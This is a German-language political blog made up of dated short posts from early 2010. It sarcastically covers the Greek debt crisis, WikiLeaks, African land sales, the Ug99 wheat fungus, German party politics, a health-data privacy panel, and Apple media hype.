Oh übrigens, kommt euch dieser Kreislauf bekannt vor? Er sollte, denn die Situation Deutschland-Griechenland entspricht zum Großteil der Situation China-USA. Und das Konzept, Ländern Infrastrukturprojekte aufzuschwatzen, für die sie dann immense Schuldenberge mit sich rumtragen, das sollte euch auch bekannt vorkommen. Das ist nämlich genau das, was der Weltwährungsfonds und die Weltbank mit Afrika gemacht haben. Das sind alles alte Konzepte, seit vielen Jahren bewährt. Es ist schon eine Ironie der Geschichte, dass ausgerechnet die Amis, die damit ja angefangen haben, selber zum Opfer fast der selben Masche geworden sind.
Update: Mir mailt gerade jemand noch einen interessanten Punkt: Deutschland und Frankreich können den anderen Ländern auch über die technischen Umweltschutzstandards u.ä. ihre Technologie aufzwingen.

Mon Mar 15 2010

[l] Wikileaks veröffentlicht ein SECRET/NOFORN Dokument, in dem US-Geheimdienste beraten, wie sie Wikileaks plattmachen können. Der Plan sieht vor, systematisch Quellen von Wikileaks zu identifizieren und öffentlich zu machen, damit sich keiner mehr traut, bei Wikileaks Dinge zu leaken.
Since WikiLeaks uses ``trust as a center of gravity by protecting the anonymity and identity of the insiders, leakers or whisteblowers'', the report recommends ``The identification, exposure, termination of employment, criminal prosecution, legal action against current or former insiders, leakers, or whistleblowers could potentially damage or destroy this center of gravity and deter others considering similar actions from using the Wikileaks.org Web site''.
Nun, äh, so richtig erfolgreich war das ja nicht *hust*.
Wem NOFORN nichts sagt: das ist ein US-Geheimhaltungszusatz, der besagt, dass das Dokument Ausländern nicht zugänglich gemacht werden darf (also auch nicht innerhalb der Nato o.ä.).
Update: Einer meiner Werbekunden teilt mir gerade mit, dass sie ein Wikileaks-Support-T-Shirt ins Angebot genommen haben, und fünf Euro des Preises direkt an Wikileaks weiterreichen wollen.

Sun Mar 14 2010

[l] Die Berliner U-Bahn hat vier Hilfszüge, die Berliner S-Bahn nur einen, und der muss jetzt für ein paar Wochen in die Werkstatt. Hilfszüge braucht man bei Unfällen und Entgleistungen. Das Streckennetz der U-Bahn ist übrigens deutlich kleiner als das der S-Bahn. Toll, liebe Bahn, das habt ihr ja prima gemacht.

Fri Mar 12 2010

[l] Die A1, vor zweieinhalb Monaten grundsaniert, muss jetzt wieder grundsaniert werden. Und jetzt ratet mal, welche Firma die letzte Sanierung gemacht hat. Na? Kommt ihr nie drauf!
Das verantwortliche Ausbaukonsortium A1-Mobil um die Papenburger Baufirma Bunte sowie die Bilfinger-Berger-Gruppe will mit Laboranalysen nach dem Grund für die Schäden suchen.
Na was für ein Zufall… diese ganzen bedauerlichen Einzelfälle, die sich da häufen! What are the odds! (Danke, Jason)

Wed Mar 10 2010

[l] Wisst ihr, was Äthiopien gerate tut? Nee? Wollt ihr es wissen? Sie verkaufen ihre fruchtbaren Gebiete an andere Länder.
Ethiopia is one of the hungriest countries in the world with more than 13 million people needing food aid, but paradoxically the government is offering at least 3m hectares of its most fertile land to rich countries and some of the world's most wealthy individuals to export food for their own populations.
And I think to myself … what a wonderful world!
Überlegt euch mal, wie kaputt wir die mit IMF und "Hilfsprogrammen" gemacht haben müssen, dass die sich zu so einem Schritt genötigt sehen. Oh und nicht nur Äthiopien. Auch die anderen. Bei Äthiopien ist es nur besonders pervers für uns, weil wir die Hungerproblematik dort kennen. Aus der Werbung für "Hilfsprogramme". Auch der Kongo ist betroffen:
Some of the African deals lined up are eye-wateringly large: China has signed a contract with the Democratic Republic of Congo to grow 2.8m hectares of palm oil for biofuels. Before it fell apart after riots, a proposed 1.2m hectares deal between Madagascar and the South Korean company Daewoo would have included nearly half of the country’s arable land.
Naja, vielleicht haben die ja wenigstens einen guten Deal gekriegt, denkt sich jetzt vielleicht der eine oder andere. Nein, haben sie nicht:
Water is also controversial. Local government officers in Ethiopia told the Observer that foreign companies that set up flower farms and other large intensive farms were not being charged for water. “We would like to, but the deal is made by central government,” said one. In Awassa, the al-Amouni farm uses as much water a year as 100,000 Ethiopians.
Achtung: dieser Artikel wird euch wütend machen.
Aber aber aber die "Hilfslieferungen", mit denen kaufen wir uns doch frei von der Schuld, oder? Nun, äh, Live Aid hat hauptsächlich Waffen für Äthiopiens Rebellen bezahlt und die Essenslieferungen für Somalia kommen nicht bei den Hungernden an:
As much as half the food aid sent to Somalia is diverted from needy people to a web of corrupt contractors, radical Islamist militants and local United Nations staff, according to a new Security Council report.
Am härtesten daran finde ich den "local United Nations staff".
Update: Auch die Zeit hat einen Artikel zum Thema.

Fri Mar 5 2010

[l] Und noch ein prominentes Paypal-Opfer: Cryptome. Mit Wikileaks zusammen hat Paypal also einmal alle offenen Leak-Optionen plattgemacht.

Tue Mar 2 2010

[l] Es gibt da offenbar einen ausgerottet geglaubten Pilz, der Weizen befällt. Wikipedia hat eine Seite dazu (ja, natürlich die englische, in der deutschen wurden der Artikel über das Problem und der über den Pilz gelöscht).
Indeed, 90 percent of the world’s wheat has little or no protection against the Ug99 race of P. graminis. If nothing is done to slow the pathogen, famines could soon become the norm — from the Red Sea to the Mongolian steppe — as Ug99 annihilates a crop that provides a third of our calories. China and India, the world’s biggest wheat consumers, will once again face the threat of mass starvation, especially among their rural poor. The situation will be particularly grim in Pakistan and Afghanistan, two nations that rely heavily on wheat for sustenance and are in no position to bear added woe. Their fragile governments may not be able to survive the onslaught of Ug99 and its attendant turmoil.
Das klingt ja alles nicht so erfreulich.
Oh und wenn ihr schon bei Wikipedia klickt, folgt auch unbedingt diesem "see also" Link. Unglaublich, aber wahr: die US-Luftwaffe hat eine Biowaffe aus dem Pilz gemacht (nun, der alten Generation).

Wed Feb 24 2010

[l] Die FDP Baden-Württemberg warnt in einer Email vor dem NDR-Magazin "Panorama". Wo kämen wir da auch hin, wenn Politiker sich den Fragen von unabhängigen Journalisten stellen müssten!
Dann folgt die Warnung: "Da von dieser Redaktion nach den kürzlich gemachten Erfahrungen kein objektiver Journalismus erwartet werden kann", schreibt Haag, "möchte ich Sie auf die Gefahr aufmerksam machen, bei Interviews als ungewollter Stichwortgeber einer gegen uns gerichteten Medienberichterstattung aufzutreten."
Das alleine ist ja schon mehr als popcornwürdig, aber der eigentliche Kracher kommt noch:
Die Mail endet mit einem freundlichen Hinweis auf eine andere ARD-Anstalt: "Zu Ihrer Information: Es wird auch ein Team des SWR vor Ort sein." Der Südwestrundfunk ist Haags Heimatsender.
Damit ist klar, was von SWR-Politsendungen zu halten ist. (Danke, Tilman)

Mon Feb 22 2010

[l] Hahaha, OMG, lest euch mal dieses Interview mit Papandreou durch, da lacht ihr euch kaputt! Der hält sich für einen Obama:
Aber die Bürger haben uns gewählt, weil sie einen Wandel wollen.
Die Älteren unter euch werden sich noch an seinen Großvater und seinen Vater erinnern, denn der Papandreou-Klan ist in Griechenland sowas wie der Bush-Clan in Amerika. Und auch wenn der sich jetzt als den Messias darstellt, der anderer Leute Mist wegräumt: seine Partei PASOK hat auch den EWU-Beitritt gemacht (und damit die Bilanzfälschung zu verantworten damals) und war auch bis 2004 im Amt und ist für die Schuldenberge verantwortlich.

Fri Feb 19 2010

[l] Wal-Mart hat in den USA erstmalig weniger Umsatz als im Vorjahr gemacht. Völlig klar also: die Rezession ist vorbei!1!!
(Das "erstmalig" kommt aus einem Artikel bei der Financial Times, den ich aber nicht verlinke hier, weil sie ihren Webauftritt ver-DRM-t haben)

Wed Feb 17 2010

[l] Und noch eine Immobilienblase ist geplatzt: die Eigentümer der grenzüberschreitenden Schmuggeltunnel im Gazastreifen gehen gerade alle pleite. Der Hintergrund ist laut Haaretz, dass Hamas offizielle Schmuggeltunnel nach Ägypten aufgemacht hat und daher jetzt keiner mehr die illegalen braucht :-) (Danke, Mathias)

Tue Feb 16 2010

[l] Die CSU merkt, dass sie am Abstürzen ist, und versucht sich jetzt an Attac und dem CCC festzuklammern. Besonders hart ist die folgende Behauptung:
In den vergangenen Wochen gab es erste Gespräche. "Die Rückmeldungen waren sehr positiv", sagt Weber. "Es ist für uns enorm spannend." Der CCC sei gar selbst auf ihn zugekommen, erzählt Weber. Man habe in ersten Gesprächen große inhaltliche Überschneidungen, etwa beim Datenschutz, gefunden. "Beim Thema Netzsperren werden wir dagegen nicht einig werden", gibt Weber zu.
Wir sind natürlich nicht auf ihn zugegangen, sondern er hatte vorher in einem Interview gesagt, er würde gerne mal mit dem CCC reden, und wir haben ihm dann den Datenbrief erklärt.
Und wenn die CSU schon die Realität so frei auslegt, dann mache ich das auch mal: Ich freue mich, liebe CSU, dass ihr den Datenbrief zum Kernprojekt eurer Datenschutzpolitik gemacht habt.
[l] dctp.tv hat eine Video-Serie über Blogger unter dem Label "Meinungsmacher" gemacht, und da hab ich auch mal mitgemacht. Das ist ein Experiment für mich, weil ich eigentlich gerade meine Person raushalten will, damit keiner Meldungen mehr glaubt oder weniger glaubt, weil meine Person damit verbunden ist. Aber nachdem es eh Videos von mir bei Vorträgen gibt, habe ich mir gedacht, ich mache mal einen Pilotversuch und gucke, wie die Reaktionen sind.
Dieses Mal sind übrigens auch Frauen unter den Interviewpartnern, nicht nur Tim Pritlove und ich. Die veröffentlichen ja immer so 3-4 Videos auf einmal, und hatten bisher nur Männer, weil sie sich an den Blogcharts orientiert haben, ohne aufs Geschlecht zu gucken, und da sind hauptsächlich Männer drin.
[l] Da hilft nur … Hubschraubereinsatz!!1! Briten melden erste Verhaftung nach Verfolgung des Verdächtigen mit Drohneneinsatz.
Ein mit einer Thermokamera ausgerüstetes "Unmanned Air Vehicle" (UAV) hatte letzte Woche einen 16-Jährigen ausfindig gemacht, der eines Autodiebstahls verdächtigt wird. Der Quadrokopter hatte ihn durch seine Körperwärme im Nebel "zielgenau" an einem Kanal liegend lokalisiert und in 100 Meter Höhe bis zum Eintreffen von Beamten "patrouilliert".
Schöne neue Welt. Ich muss mich gerade an einen ollen Film aus den 80er Jahren erinnern, Blue Thunder. Lief hier unter dem Namen "Das fliegende Auge". Der Plot war, dass sie einen speziellen Hubschrauber bauen, und einen Polizisten damit trainieren, und der Polizist merkt dann, dass das ein Schnüffel- und Unterdrückungswerkzeug ist, und macht den am Ende kaputt. Die Vorstellung, dass der Staat die Bevölkerung mit Nachtsicht-Überwachungshubschraubern gängelt, war damals un-denk-bar. Das waren noch Zeiten. So naiv und unschuldig… (Danke, Jochen)

Thu Feb 11 2010

[l] Ich bin ja fasziniert, was für eine unseriöse Abzockscheiße diese Devisenmärkte sind. Jetzt, wo Deutschland die Griechen retten will, geht der Euro hoch. Wie ist denn da bitte die Rationale für? Wenn wir Griechenland rausgekantet hätten, DAS wäre gut für den Euro gewesen. Dann hätten wir das Signal gegeben, dass der Euro was wert ist, dass wir da keine Betrüger und Bilanzfälscher dulden. Also jedenfalls keine, die es so plump bzw in so einem Umfang machen. Alle anderen schönen natürlich auch an ihren Bilanzen herum. Seufz.
Politisch wäre das eine Katastrophe gewesen für Europe, aber für die Währung Euro wäre das gut gewesen.
Der Bailout ist genau das Gegenteil. Da wird die Währung der Politik geopfert. Die immensen Verbindlichkeiten werden nur über Inflation abbaubar sein, wenn sie uns nicht alle in den Ruin treiben (was ich für den wahrscheinlicheren Ausgang halte). Der Euro hätte runter gehen müssen, nicht rauf. Vor allem hat Griechenland ja jetzt erst Recht überhaupt keinen Grund mehr, nicht unlimitiert Schulden zu machen. Sie wissen ja, dass sie einen Bailout kriegen, wenn sie vor dem Bankrott stehen. Weil es den doofen Eurokraten zu peinlich wäre, wenn die Amis über den IMF retten müssten.
Aber so können wir alle weitermachen, als wäre nichts gewesen. Wir tun einfach so, als sei keine erdrückende Schuldenlast da, wir nehmen einfach weiter Kredite auf und kaufen damit Mist aus China, den wir nicht brauchen. Und die Trader verdienen weiter an allen Transaktionen. Deshalb ist der Euro hochgegangen.
Das zeichnet sich ja schon länger ab, das Signal, dass wir einfach mehr Geld drucken und alle Pleitiers und Hasardeure auffangen. Das bestraft alle, inbesondere aber die, die ordentliche Buchhaltung machen und nicht pleite gehen. Jetzt hat erst Recht kein Großkonzern und keine Bank mehr einen Grund, die Geschäfte seriös durchzuführen. Das haben wir echt ganz toll gemacht.
Und spieletheoretisch sind wir langsam soweit, dass das auch aus unserer Sicht am sinnvollsten ist, weiter Schulden zu machen. Ab einer gewissen Schuldengröße hat nicht mehr der Schuldner das Problem, sondern der Gläubiger.

Tue Feb 9 2010

[l] Ihr kennt bestimmt aus dem Fernsehen diese Deals zwischen Staatsanwaltschaft und dem Angeklagen. Die Staatsanwaltschaft bietet einem Angeklagten Strafmilderung an, wenn er dafür seine Mitangeklagten belastet. Sowas gibt es auch andersherum. Strafmilderung, wenn man nicht zu detailliert auspackt, weil es sonst peinlich für den Staat würde. Sowas erwartet z.B. den Schreiber, und sie haben es auch mit den Sauerländern probiert. Und der "Chef" der Sauerland-"Terrorzelle" ist auch voll drauf reingefallen, hat seine Kumpels inkriminiert und umfassend gestanden, ohne die peinlichen Details über das CIA-Involvement groß auszurollen, und als Dank kriegt er… gar nichts. Da hat die Bundesanwaltschaft ja mal deutlich gemacht, was zukünftige Angeklagte von ihren Deal-Angeboten zu halten haben.

Sat Feb 6 2010

[l] Jetzt ist auch eine CD mit raubkopierten angeblichen Steuerdaten in Bayern aufgetaucht.
Mich erinnert das ja an eine Geschichte, die der CCC vor ein vielen Jahren mal hatte. Andy hat die mal in einer gemeinsamen Radiosendung erzählt. Aus dem Gedächtnis: Das fing so an, dass eine Bank bei uns anrief, wo wir denn das Geld hinhaben wollen. Wir wußten natürlich von nichts. Da kam dann raus, dass jemand rumlief und Firmen ansprach, er sei vom CCC und habe hier diese Steuerdaten von ihnen und würde sie ihnen zurückverkaufen. Der hat dann das Geld eingesammelt und den Firmen einen Stapel leerer Disketten in die Hand gedrückt. Wir haben den Banken gesagt, Leute, verklagt diesen Typen. Der erpresst euch doch offensichtlich! Aber keine Bank wollte. Der ist später in die Psychiatrie eingewiesen worden und soll dann von dort aus per Telefon weitere solche Deals gemacht haben, wenn ich mich recht entsinne. Sogar das ehemalige Nachrichtenmagazin hatte was dazu damals.
An sich ist das doch genau das selbe hier gerade, nur dass es eben der Staat macht, nicht ein Mann aus der Psychiatrie. Wobei das natürlich ein schöner Ausgang der Sache wäre, wenn Schäuble jetzt in die geschlossene Abteilung eingewiesen würde :-)

Fri Feb 5 2010

[l] Die New York Times hat einen spannenden Artikel über Microsoft, geschrieben von Dirk Brass, der Vizepräsident dort war und sich daher auskennt. Ich möchte mal vor allem diesen Teil hier zitieren:
For example, early in my tenure, our group of very clever graphics experts invented a way to display text on screen called ClearType. It worked by using the color dots of liquid crystal displays to make type much more readable on the screen. Although we built it to help sell e-books, it gave Microsoft a huge potential advantage for every device with a screen. But it also annoyed other Microsoft groups that felt threatened by our success.
Engineers in the Windows group falsely claimed it made the display go haywire when certain colors were used. The head of Office products said it was fuzzy and gave him headaches. The vice president for pocket devices was blunter: he’d support ClearType and use it, but only if I transferred the program and the programmers to his control. As a result, even though it received much public praise, internal promotion and patents, a decade passed before a fully operational version of ClearType finally made it into Windows.
Und danach erzählt er, wie die Office-Gruppe in Microsoft den Tablet PC sabotiert hat. Wie Office auch heute noch nicht sauber auf einem Tablet PC läuft. Und wie sie die Tablet-Gruppe sogar zugemacht haben, obwohl sie wußten, dass Apple mit einem Tablet PC rauskommen würde. (Danke, Oliver)
[l] Manche Trends sind ja auch gut. Der hier z.B.: FDP stürzt ab.
Weniger als die Hälfte derer, die noch am 27. September ihr Kreuzchen bei der FDP gemacht haben, würden das zum gegenwärtigen Zeitpunkt erneut tun.
Ja aber warum denn bloß? Hat die Partei der Bürgerrechte nicht großartige Fortschritte bei den Bürgerrechten gemacht? Und ihr innovatives Konzept des Schuldenabbaus durch Schuldenmachen, das überzeugt euch auch nicht? Ihr seid aber schwer zufriedenzustellen!1!!
Da freue ich mich doch, meine Schärfchen zu beigetragen zu haben :-)

Wed Feb 3 2010

[l] Ach du meine Güte: Das LG Hamburg findet, dass Abmahnungen auch per Email zugestellt werden dürfen. Allen, die schon mal mit Email gearbeitet haben, wissen, was das heißt: Die Abmahnungen bleiben im Spamfilter hängen.
Die Kläger erwirkten eine einstweilige Verfügung gegen die Beklagte. Anschließend stritten die Parteien aber über die Kosten des Verfahrens. Das Landgericht Hamburg entschied, dass die von einer Firewall abgefangene E-Mail als "zugegangen" zu beurteilen sei und dass das Risiko, dass eine solche E-Mail verloren gegangen sei, ganz bei dem Abgemahnten läge.
Heilige Scheiße, das ist selbst für das LG Hamburg eine unglaubliche Verfehlung. Mit anderen Worten: das LG Hamburg zwingt Deutschland, keine Spamfilter einzusetzen, und täglich ihren Spam komplett zu lesen. Un-glaub-lich. (Danke, Wolfgang)

Mon Feb 1 2010

[l] Wisst ihr, heute war ich kurz davor, den Focus zu loben. Sooo kurz davor war ich. Und zwar wegen dieses Artikels hier. Lest ihn euch mal durch. da steht nichts lobenswertes? Habt ihr Recht. Und jetzt guckt euch mal an, was in der Version von heute mittag um 14:00 stand:
Dartmann hatte am Sonntag eine „vollständige Aufklärung im Interesse der Opfer“ angekündigt. Der Orden hat Ursula Raue, lange Jahre Vorsitzende der Kinderschutzorganisation „Innocence in Danger“, mit Ermittlungen beauftragt.
"Innocence in Danger", wir erinnern uns, ist die Hilfsorganisation, der Frau von und zu Guttenberg angehört, die hinter Herr Guttenbergs plötzlichem Involvement beim Internetzensieren vermutet wird, und die beim Rückverfolgen nicht belegter Zahlen zum Thema Kinderpornographiemarkt im Internet aus der Schmierenkampagne der Frau von der Leyen als Quelle auffiel. Z.B. der angebliche Millionenmarkt, den es da angeblich gibt, und den Zensursula immer rührig austrocknen wollte. Und DIE tauchen jetzt als Vertuschungsbeauftragte in Sachen Kindesmißbrauch auf? Bei einer PR-Kampagne, mit der sich die Jesuiten jahrzehntelang zurückliegende und ihnen seit dem bekannte und nicht bearbeitete Missbrauchsfälle mediengerecht vom Hals schaffen wollen?! Von einem Interesse an Aufarbeitung kann ja wohl keine Rede sein, nachdem die da zwanzig Jahre drauf gesessen haben, und einen geständigen Missbraucher zur Jugendarbeit (!) aufs Land geschickt haben. Das wäre in der Tat eine lobenswerte journalistische Aufdeckleistung gewesen.
Schade nur, dass es da jetzt nicht mehr steht. Und dass da jetzt auch nicht steht, warum das da nicht mehr steht. Beim Googeln kann man finden, dass Ursula Raue tatsächlich Präsidentin von "Innocence in Danger" war (bzw, immer noch ist? Deren Webseite ist nicht hilfreich…).
Nun, vielleicht hat der Focus das gelöscht, weil es eine Falschinformation war. Könnte man denken, bis man dieses Interview beim Deutschlandfunk von heute mit Frau Raue zum Thema findet. Wieso hat der Focus das also weggemacht?
Update: Jemand twittert rum, ich hätte da bloß "den Link verwechselt". Das ist eine Lüge. Ob das das Focus-Schadensbegrenzungs-Team ist?

Fri Jan 29 2010

[l] Kurze Schadensbegrenzung der Staatskanzlei: "Die Neufassung des Jugendmedienschutzstaatsvertrages JMStV soll keineswegs eine Kompletthaftung der Zugangsprovider für Inhalte im Internet bringen". Na dann. Ob sie das jetzt auch so sehen würden, wenn wir da kein Fass aufgemacht hätten?
[l] Der Berliner Bausumpf existiert seit dem 2. Weltkrieg, durch den Sonderstatus Berlins gab es immer gehäuft Gelder für den Wiederaufbau von Immobilien, und wo es Geld gibt, und die CDU am Start ist, da gibt es einen Sumpf, das wissen wir ja alle. Schon vom Wortstamm her kommt Berlin vom slawischen Wort für Sumpf, insofern passt das ja auch, dass Berlin da besonders betroffen ist. Traditionell ist in Berlin der Übergang zwischen dem Immobiliensumpf und dem Bankenskandal fließend, und von den CDU-Kadern von damals hat nur Klaus Landowsky eine Strafe gekriegt, und das war nur eine Bewährungsstrafe. Sumpf halt.
Nun gibt es ja ewige Optimisten, die sich denken, hey, wenn die CDU nicht mehr an der Macht ist, dann trocknet auch der Sumpf aus, aber, wie sich rausstellt, haben die ihre Rechnung ohne die Verräterpartei gemacht, denn wenn es um Geld und Inkompetenz gibt, ist die SPD lernfähig. Immobilienskandale spielen sich in Deutschland in letzter Zeit vor allem um Wohnungsbaugesellschaften ab, die entweder an Heuschrecken verkloppt werden, oder denen kurzfristig die Bilanz tiefergelegt werden soll, um sie für Heuschrecken attraktiver zu machen. Money Quote:
Nachdem bereits in den letzten Wochen viele Lokalzeitungen über die völlig überzogenen Mietsteigerungspläne in über 3.000 Plattenbauwohnungen der landeseigenen HOWOGE in Berlin Buch berichteten, stellte sich nun heraus, dass ausgerechnet der SPD Abgeordnete Ralf Hillenberg mit seiner privaten Planungsbüro den Auftrag für die Sanierung erhalten hatte. Ralf Hillenberg ist nicht nur ein einfacher Abgeordneter, der nebenher in einem Ingenieur- und Bauplanungsbüro arbeitet, sondern der stellvertretende Vorsitzende des Bauausschusses im Berliner Abgeordnetenhaus.
Ich empfehle auch den taz-Artikel dazu.
Der lukrative Job in Buch war nicht der erste Auftrag der Howoge für Hillenberg. Seit 1998 ist der 53-Jährige nach eigenen Angaben für die Howoge tätig. Seit jener Zeit also, in der die Howoge - Zufall oder nicht? - ihre eigene Planungsabteilung aufgelöst hat.
Die SPD findet natürlich offiziell nichts schlimmes an der ganzen Chose. Momper findet z.B., dass das alles legal war. Weitere Anforderungen stellt man bei der SPD offensichtlich nicht. Daher ist es auch nicht anstößig für die SPD, wenn die bisherige Sprecherin der Senatsverwaltung für Stadtentwicklung zum 1. April zur "Deutsche Wohnen" wechselt. Das sind ja Zustände… wie beim Gesundheitsministerium und der Pharmaindustrie!1!! (Danke, Anne)

Thu Jan 28 2010

[l] Heute ist der 4. Europäische Datenschutztag, anlässlich dessen der Berliner Datenschutzbeauftragte in der Charité eine Veranstaltung mit Podiumsdiskussion gemacht hat, zu der ich als Podiumsdiskutant eingeladen war. Das Thema der Veranstaltung war "Gesundheitsdaten im Netz: Zu Risiken und Nebenwirkungen für das Persönlichkeitsrecht der Patienten". Ich lasse hier mal aus Platzgründen die ganzen akademischen Titel weg.
Man hatte mir vorher diskret zu Verstehen gegeben, dass durchaus erwünscht ist, wenn ich provokante Thesen äußere und damit die anderen Teilnehmer ein bisschen animiere. Außerdem hieß es, ich sei der einzige Techie und das Publikum sei aus dem Gesundheitssektor, und damit war klar, dass ich da keine technischen Details ausbreiten kann.
Ich eröffnete mein Plädoyer also mit dem Satz, ich sei ja hier als Vertreter der Patienten da, weil für die anderen Interessengruppen für ausreichend Vertretung gesorgt sei. Das gefiel den anderen Teilnehmern schon mal gar nicht, besonders Thilo Weichert vom ULD in Kiel und der direkt neben mir sitzende Vertreter des Bundesverbandes der Verbraucherzentralen schienen mir zu zürnen :-)
Normalerweise auf solchen Veranstaltungen kommt das Gespräch dann irgendwann darauf, dass man ja Datenbanken verknüpfen könnte, oder bei einer technischeren Veranstaltung fällt der Begriff Datamining. In solchen Fällen weise ich normalerweise darauf hin, dass man das ja früher Rasterfahndung nannte und total doof fand. Bei dieser Veranstaltung passierte etwas, das mir so noch nie passiert ist: die redeten von sich aus von Rasterfahndung. Der Datenschutzbeauftragte der Barmer war als Vertreter der Krankenkassen auf dem Podium und fing da plötzlich an, seinem Bedauern Ausdruck zu verleihen, dass sie die ganzen schönen Daten ja gar nicht nutzen können, weil es so viel Datenschutz gibt bei uns in Deutschland. Im Schlußwort meinte dann der Vorstandsvorsitzende der Charité auch noch, der Forschungsstandort Deutschland für klinische Forschung sei im Hintertreffen und wir brauchen die Rasterfahndung auf den ganzen Daten, wenn wir ihn retten wollen. Das hat mich ziemlich schockiert. Denen ist klar, dass sie da von Rasterfahndung reden, und sie wollen es alle haben. Und die Krankenkassen glauben wirklich, wir glaubten ihnen, dass sie auf den Daten kein Datamining machen.
Ich habe mitgenommen, dass Herr Weichert böse ist, dass die Konnektoren gerade aus dem Konzept rausfliegen (was ich für einen Gewinn halte, weil es die Komplexität senkt). Herr Etgeton (Verbraucherzentralen) versuchte, einen positiven Gesamteindruck aufzubauen, nach dem Motto "wenn wir uns anstrengen, wird doch noch alles gut", und er hatte da auch ganz hehre (man könnte fast sagen: von jugendlichem Optimismus geprägte) Annahmen wie dass der mündige Bürger rational entscheidet, wem er seine Daten gibt und wem nicht. Insgesamt war Konsens, dass man etwas tun muss, um die Akzeptanz der Gesundheitskarte zu steigern. Irgendjemand sprach dann erfreulicherweise auch den Punkt an, dass die Gesundheitskarte in der aktuellen Planung überhaupt nichts leistet, was nicht auch das bestehende System leistet, und niemand widersprach. Alle nickten. Größter Verfechter der Gesundheitskarte war Herr Bartmann, der Präsident der Ärztekammer Schleswig-Holstein. Er argumentierte vor allem mit der und für die Fallakte (die AFAIK nur optional ist in der aktuellen Planung, nur die Rezepte sind tatsächlich Pflicht) und meinte z.B., im Moment dauere es teilweise Monate, bis der überweisende Arzt mal mitgeteilt kriegt, was die im Krankenhaus mit seinem Patienten gemacht haben, und das ginge ja per Schneckenpost und sei furchtbar ineffizient. Ich kam leider nicht mehr dazu, ihn zu fragen, welche Postdienstleister sie da verwenden, der Monate für die Zustellung braucht, wo doch sogar die gute alte Bundespost inzwischen bundesweit i.A. innerhalb eines Tages zustellen kann.
Meine Thesen waren noch, dass für den normalen Bürger überhaupt kein Unterschied zwischen der eGK und Google Health erkennbar sei, weil er in beiden Fällen irgendwelchen ihm unbekannten Leuten vergleichbare Datensicherheits-Versprechen schlicht glauben muss. Google ist sogar im Vorteil, wenn ihr mich fragt, weil denen ja noch nie irgendwas verloren gegangen ist (wenn man mal von dem China-0day neulich absieht, und das ist ja auch diversen Ministerien bei uns passiert, da ist also unentschieden), während bei der eGK der zuständige Dienstleister T-Systems ist, also die Telekom, und die hat ja nun gerade 2009 kein besonders überzeugendes Bild abgegeben in der Beziehung.
Ich habe auch noch argumentiert, dass wenn ich zum Arzt gehe, und es mir richtig schlecht geht, dass ich dann lieber einen Arzt will, der 80-90% seiner Hirnkapazität dafür frei hat, mir zu helfen, und keinen Arzt, der 40% seines Hirns mit Sorgen über seine komplexe IT-Umgebung verplempert. Das stieß auch auf breiten Widerstand. Alle Beteiligten legten Wert darauf, dass sie moderne Menschen sind und mit Computern umgehen können und das ja wohl selbstverständlich sei. OK, kann man ja nicht ausschließen, dass die Anwesenden da gerade die Ausnahmen in Deutschland sind, die sich auch mit Computern auskennen :-)
Ein Höhepunkt war noch, als Herr ~~Bartmann (Ärztekammer)~~ Ellis (Update: ich dachte Bartmann, aber Herr Krempl sagt Ellis und der hat mitgeschrieben, dem vertraue ich mal mehr als meinem Gedächtnis) dann erzählte, er habe ja mal in Skandinavien gewohnt, und bei denen sei das ja selbstverständlich, dass die da die ganzen Daten offen verknüpfen, und da hätten sie ganz tolle Erkenntnisse draus gewonnen, z.B. Krebsrisiko für Kinder von Schwangeren, die irgendwas nehmen. Nach entsprechender Anonymisierung der Daten kann man sowas auch in Deutschland machen, soweit ich weiß.
Update: Stefan Krempl von Heise war auch da und hat noch dieses tolle Zitat, das ich bestätigen kann:
Eine "Rasterfahndung mit Krebsdaten" zuzulassen sei legitim, da durch Tumore "mehr Menschen sterben als durch Terroristen".
[l] Das Ende der Welt naht. Das weiß ich daher, dass das ehemalige Nachrichtenmagazin einen Live-Ticker anlässlich des Apple-Nonevents gemacht hat. Und auch die Tagesschau bringt Apple-Agitprop der übelsten tiefsten Schublade, mit einem "Experten", den sie auch noch bei der c't gefunden haben wollen, die ja an sich keinen so schlechten Ruf genießt. Der gibt dann bei tagesschau.de Dinge von sich wie
tagesschau.de: Bei Apple ist immer wieder von innovativen, gar revolutionären Produkten die Rede: iPod, iTunes, iPhone … Waren das wirklich Revolutionen oder wird das im Rückblick vielleicht ein bisschen zu stark verklärt?
Schuster: Das kann man gar nicht genug verklären. Das zeigt aber nicht wie gut Apple ist, sondern wie schlecht die anderen sind!
Aha. Soso. Und:
Den Boden bereitet hat der iPod. Der hat mit seiner Einfachheit und seinem Bedienkonzept viele Leute begeistert. Die haben sich daraufhin andere Apple Produkte angeschaut und festgestellt: Die sind durchaus einfacher zu bedienen als Windows-PCs.
Man kann gar nicht so viel fressen, wie man da kotzen muss. Ich frage mich ja, wieviel Provision die Beteiligten da abgreifen für ihre Werbung. Und ICH mache mir Sorgen, mit Werbung meine Neutralität zu gefährden! Grotesk, geradezu. Vor allem, was da für Spezialexperten schreiben, beim ehemaligen Nachrichtenmagazin z.B. mit diesen aufklärenden Informationen:
Auch Multitasking kann das iPad nicht, also mehrere Apps gleichzeitig ablaufen lassen. Stattdessen ist nur Multithreading möglich; man kann also immerhin Musik hören, während man E-Mails schreibt.
Aaa-ha.

Wed Jan 27 2010

[l] Und hier eine Meldung für die Atheisten unter euch: Mehr als 200 Russen haben sich mit kontaminiertem Weihwasser vergiftet. Wer weiß, vielleicht ist das früher immer die Selbstregulierung der Natur gewesen, dass sich die ganzen religiösen Spinner selbst vergiften, und wir haben dieses Korrektiv mit der modernen Hygiene kaputtgemacht. (Danke, Holgi)
[l] Und noch ein Schuhwurf: Mann wirft seine Schuhe nach der obersten Richterin Israels, trifft sie im Gesicht. Soll wohl auch ihre Brille kaputtgemacht haben dabei.

Tue Jan 26 2010

[l] Unser größtes Problem auf der Welt ist ja die Überbevölkerung. Peak Oil, Peak Uran, Global Warming, das wäre alles kein Problem, wenn wir nicht so viele Menschen wären. Anders formuliert: The Greatest Shortcoming of the Human Race is our Inability to Understand The Exponential Function. Siehe auch diese Grafik.
Warum sage ich das? Weil es jetzt mal ein Mainstream-Politiker anspricht: der Republikanische Gouverneurskandidat von South Carolina sagte im Wesentlichen "gebt den Armen kein Essen, sonst vermehren die sich nur".
"My grandmother was not a highly educated woman, but she told me as a small child to quit feeding stray animals. You know why? Because they breed," Bauer said, according to the Greenville News. "You're facilitating the problem if you give an animal or a person ample food supply. They will reproduce, especially ones that don't think too much further than that. And so what you've got to do is you've got to curtail that type of behavior. They don't know any better."
